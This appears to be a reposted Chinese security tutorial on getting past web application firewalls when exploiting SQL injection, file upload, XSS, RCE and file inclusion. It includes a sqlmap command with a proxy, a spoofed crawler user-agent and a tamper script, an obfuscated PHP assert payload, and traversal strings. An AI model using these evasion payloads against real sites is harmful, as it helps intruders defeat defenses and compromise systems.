【WAF绕过-4】漏洞利用之注入上传跨站等绕过

news2024/11/16 12:25:38

在这里插入图片描述

1、SQL注入

如需sqlmap注入测试,
防cc拦截:修改user-agent头+代理(付费代理池)
修改user-agent头:
(1)加参数:--random-agent
(2)加参数:--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
各大搜索引擎的User-Agent:https://www.cnblogs.com/iack/p/3557371.html

在这里插入图片描述

(3)修改配置文件sqlmap.conf中的agent变量值
加代理:--proxy="http:tps123.kdlapi.com:15818"
绕过安全狗:自写tamper模块,参考如下waf-dog.py
绕过Aliyun:基本修改指纹即可(修改user-agent头)
*绕过宝塔:匹配关键字外加/

python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent

2、文件上传
1.php 截断,参考之前payload上传,绕过waf
和前面文件上传专题的绕过方法一样。
3、XSS跨站
利用xss trike绕过,加上–timeout或者–proxy绕过cc

4、RCE执行

加密编码绕过?算法可逆?关键字绕过?提交方法?各种测试?

txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce

5、文件包含
以下几种:…\ …/ …\等

涉及资源:
宝塔官网:https://www.bt.cn/
safedog官网:http://free.safedog.cn/website_safedog.html
参考:https://www.cnblogs.com/darkerg/p/14779017.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/107987.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

几十年前的老旧照片如何修复?还不知道旧照片怎么恢复清晰吗?

几十年前的老旧照片如何修复?还不知道旧照片怎么恢复清晰吗?

那些旧照片本身会随着时间的推移而褪色、褶皱。老旧照片修复主要是从褪色、变色、破损、发霉、的旧相片修复翻新,到模糊不清清晰化处理,大面积严重破损照片修补。 十年以前,没有电脑,没有手机,更没有存储照片工具。大…
阅读更多...
【关于时间序列的ML】项目 5 :用机器学习预测天气

【关于时间序列的ML】项目 5 :用机器学习预测天气

🔎大家好,我是Sonhhxg_柒,希望你看完之后,能对你有所帮助,不足请指正!共同学习交流🔎 📝个人主页-Sonhhxg_柒的博客_CSDN博客 📃 🎁欢迎各位→点赞…
阅读更多...
基于Canal+kafka监听数据库变化的最佳实践

基于Canal+kafka监听数据库变化的最佳实践

1、前言 工作中,我们很多时候需要根据某些状态的变化更新另一个业务的逻辑,比如订单的生成,成交等,需要更新或者通知其他的业务。我们通常的操作通过业务埋点、接口的调用或者中间件完成。 但是状态变化的入口比较多的时候&#x…
阅读更多...
位图详解.

位图详解.

1.位图概念 给40亿个不重复的无符号整数,没排过序。给一个无符号整数,如何快速判断一个数是否在这40亿个数中? 思考: 1.用哈希表?遍历一遍?时间复杂度O(N) 40亿个不重复无符号整数占多大内存&#xff1…
阅读更多...
springcloud配置中心nacos动态线程池Dynamic-tp配置接入实战

springcloud配置中心nacos动态线程池Dynamic-tp配置接入实战

最近业务上需要把项目组几个微服务接入动态线程池框架Dynamic-tp监控,同时支持webhook机器人接受变更通知、容量报警、活性报警、拒绝报警、任务超时报警等通知,方便项目组同事企业微信群实时监控线程池状态,动态调整线程参数。 接手开始上手…
阅读更多...
【C++学习】对二维数组进行排序

【C++学习】对二维数组进行排序

1 问题描述 今天在学习 CUDA-NMS 算法时,遇到一个小问题,就是希望对一个二维数组进行排序,具体是这样的: 需要对存储目标框的二维数组进行排序,排序的方式是按照目标框的得分score从高往低排序,也就是结果…
阅读更多...
微服务系列 - Zookeeper上篇:入门到精通

微服务系列 - Zookeeper上篇:入门到精通

一、前言 本内容仅用于个人学习笔记,如有侵扰,联系删除 视频教程:【尚硅谷】大数据技术之Zookeeper 3.5.7版本教程 源码学习:微服务系列 - Zookeeper下篇:源码解析 二、Zookeeper入门 1、概述 Zookeeper是一个开…
阅读更多...
消息队列(MQ)

消息队列(MQ)

文章目录什么是消息队列定义消息队列的特性:1、解耦:2、削峰:3、异步:使用场景传统串行化设计串行化思想:并行处理调优高可用:高并发高性能MQ的两种流派MQ常见的问题1,mq如何避免消息堆积问题。…
阅读更多...
如何解决甲乙双方需求理解巨大偏差的问题?

如何解决甲乙双方需求理解巨大偏差的问题?

1、对双方进行专业培训 需求分析人员对需求方应用领域不熟悉,而需求方对软件开发也不熟悉,通过对双方进行专业知识培训,让双方对用户专业领域和软件开发领域都有较为清晰的认识。在此基础上,需求方提出的需求更精准,双…
阅读更多...
Java中的多线程——线程安全问题

Java中的多线程——线程安全问题

作者:~小明学编程 文章专栏:JavaEE 格言:热爱编程的,终将被编程所厚爱。 目录 多线程所带来的不安全问题 什么是线程安全 线程不安全的原因 修改共享数据 修改操作不是原子的 内存可见性对线程的影响 指令重排序 解决线程…
阅读更多...
一个高性能、无侵入的Java性能监控和统计工具,有点东西!

一个高性能、无侵入的Java性能监控和统计工具,有点东西!

背景 随着所在公司的发展,应用服务的规模不断扩大,原有的垂直应用架构已无法满足产品的发展,几十个工程师在一个项目里并行开发不同的功能,开发效率不断降低。 于是公司开始全面推进服务化进程,把团队内的大部分工程…
阅读更多...
你造Python中的上下文管理器是啥吗

你造Python中的上下文管理器是啥吗

上下文管理器(Context managers)让我们在需要的时候可以准确地分配或释放资源 Python中最常用的上下文管理例子就是with语句了,一般是在操作文件的时候,比如: 有PY基础的小伙伴都知道,上面的代码等价于: 对比两个例子…
阅读更多...
python机器学习及深度学习在空间模拟与时间预测领域中的应用

python机器学习及深度学习在空间模拟与时间预测领域中的应用

了解机器学习的发展历史、计算原理、基本定义,熟悉机器学习方法的分类,常用机器学习方法,以及模型的评估与选择;熟悉数据预处理的流程,掌握python程序包的使用;理解机器学习在生态水文中的应用,…
阅读更多...
使用Python绘制圣诞树教程(附源代码)

使用Python绘制圣诞树教程(附源代码)

🤵‍♂️ 个人主页:艾派森的个人主页 ✍🏻作者简介:Python学习者 🐋 希望大家多多支持,我们一起进步!😄 如果文章对你有帮助的话, 欢迎评论 💬点赞&#x1f4…
阅读更多...
Qt Creator 运行LVGL模拟器

Qt Creator 运行LVGL模拟器

windows下用Qt Creator运行LVGL 8.2 背景 最近在学习LVGL,手头又没有硬件,好多网上资料介绍了如何在PC端模拟,纯C语言实现的库模拟的话也不会复杂,恰巧本人熟悉Qt Creator,那就用这个环境模拟吧,网上搜索…
阅读更多...
为什么企业传统网络访问海外应用程序不稳定、速度慢?怎么解决?

为什么企业传统网络访问海外应用程序不稳定、速度慢?怎么解决?

外贸、游戏等行业经常会有跨网数据访问的需求,并且访问慢、卡是常见的问题。这其中主要的原因是网络访问速度与物理距离有直接关系。刨除距离原因,还有哪些因素影响了我们的访问呢?那么访问国站慢的影响因素有哪些? 在中国的国内用户,使用应…
阅读更多...
下载安装npm,配置环境变量详细教程

下载安装npm,配置环境变量详细教程

要在本地运行项目,就需要安装npm,其次还需要配置项目依赖node-modules。今天我们就先安装npm npm下载安装一、安装1、下载2、勾选同意,下一步3、默认的存储位置即可,next4、不用勾选,next5、点击install6、等待安装完成…
阅读更多...
通过 Mito 在 Python 中使用电子表格

通过 Mito 在 Python 中使用电子表格

在本文中,您将学习如何使用这个强大的库,该库能够自动执行某些 Pandas 任务并以非常快速的方式执行数据分析。 Mitosheet是什么? Mitosheet 是 Python 中可用的众多库之一,它实际上是 Python 和电子表格之间的融合,大大加快了数据分析过程。 安装过程 您可以安装在分析…
阅读更多...
《Python多人游戏项目实战》第五节 断线重连

《Python多人游戏项目实战》第五节 断线重连

目录 5.1 模拟弱网状态 5.2 断线重连 5.3 优化玩家名称显示 5.4 完整代码下载地址 导致客户端和服务端断开连接的原因可能有以下三种: 服务端主动关闭连接。客户端窗口关闭,玩家退出游戏。客户端所在网络不给力(也叫做弱网)&…
阅读更多...
Redis - Redis持久化:AOF和RDB

Redis - Redis持久化:AOF和RDB

1. 为什么要持久化 Redis是内从数据库,宕机后数据会丢失;Redis重启后,为了快速恢复数据,提供了持久化机制;Redis有两种持久化方式:RDB和AOF,这也是Redis无畏宕机与快速恢复数据的杀手锏。 注意…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023